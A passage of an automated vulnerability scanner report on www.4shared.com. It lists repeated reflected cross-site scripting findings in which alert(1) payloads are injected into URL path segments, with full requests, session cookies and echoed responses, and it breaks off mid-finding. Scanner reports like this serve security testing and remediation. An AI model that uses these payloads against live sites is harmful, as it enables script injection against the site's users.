...[SNIP]...

2.37. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54265'-alert(1)-'f35f462a601 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:36 GMT
Content-Length: 38667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.38. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8947c'-alert(1)-'4ffa151e255 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:15 GMT
Content-Length: 38660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.39. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5909"-alert(1)-"acf9b63f14f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iconsa5909"-alert(1)-"acf9b63f14f/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /iconsa5909&quot;-alert(1)-&quot;acf9b63f14f/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:13 GMT
Content-Length: 38830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/iconsa5909"-alert(1)-"acf9b63f14f/16x16/png.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.40. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbff8"-alert(1)-"9aa0d811594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16bbff8"-alert(1)-"9aa0d811594/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16bbff8&quot;-alert(1)-&quot;9aa0d811594/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:25 GMT
Content-Length: 38834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16bbff8"-alert(1)-"9aa0d811594/png.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.41. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6157'-alert(1)-'af8b85c81bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:27 GMT
Content-Length: 38831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.42. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d233'-alert(1)-'19e2d01607d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:41 GMT
Content-Length: 38832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.43. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4750e"-alert(1)-"1afa87bf6ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/png.gif4750e"-alert(1)-"1afa87bf6ef HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif4750e&quot;-alert(1)-&quot;1afa87bf6ef
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:38 GMT
Content-Length: 38832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/png.gif4750e"-alert(1)-"1afa87bf6ef";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.44. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76784'-alert(1)-'f0ffe45a1df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:27 GMT
Content-Length: 38809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.45. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4e12"-alert(1)-"2e7080de009 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesc4e12"-alert(1)-"2e7080de009/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /imagesc4e12&quot;-alert(1)-&quot;2e7080de009/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:25 GMT
Content-Length: 38811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/imagesc4e12"-alert(1)-"2e7080de009/asf-logo.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.46. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b95f'-alert(1)-'1357208e352 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/asf-logo.gif6b95f'-alert(1)-'1357208e352 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif6b95f'-alert(1)-'1357208e352
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:39 GMT
Content-Length: 38628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/asf-logo.gif6b95f'-alert(1)-'1357208e352',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.47. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 110ef"-alert(1)-"cbe7b0fb8bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/asf-logo.gif110ef"-alert(1)-"cbe7b0fb8bd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif110ef&quot;-alert(1)-&quot;cbe7b0fb8bd
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:37 GMT
Content-Length: 38810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/asf-logo.gif110ef"-alert(1)-"cbe7b0fb8bd";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.48. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4fb'-alert(1)-'af400b9bbf6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:27 GMT
Content-Length: 38801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

2.49. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a615"-alert(1)-"4d130b814a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6a615"-alert(1)-"4d130b814a9/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images6a615&quot;-alert(1)-&quot;4d130b814a9/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:25 GMT
Content-Length: 38805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images6a615"-alert(1)-"4d130b814a9/tomcat.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.50. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef15f'-alert(1)-'638e68140b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/tomcat.gifef15f'-alert(1)-'638e68140b8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gifef15f'-alert(1)-'638e68140b8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:41 GMT
Content-Length: 38625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/tomcat.gifef15f'-alert(1)-'638e68140b8',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.51. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72d4f"-alert(1)-"5ac35c7e5b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

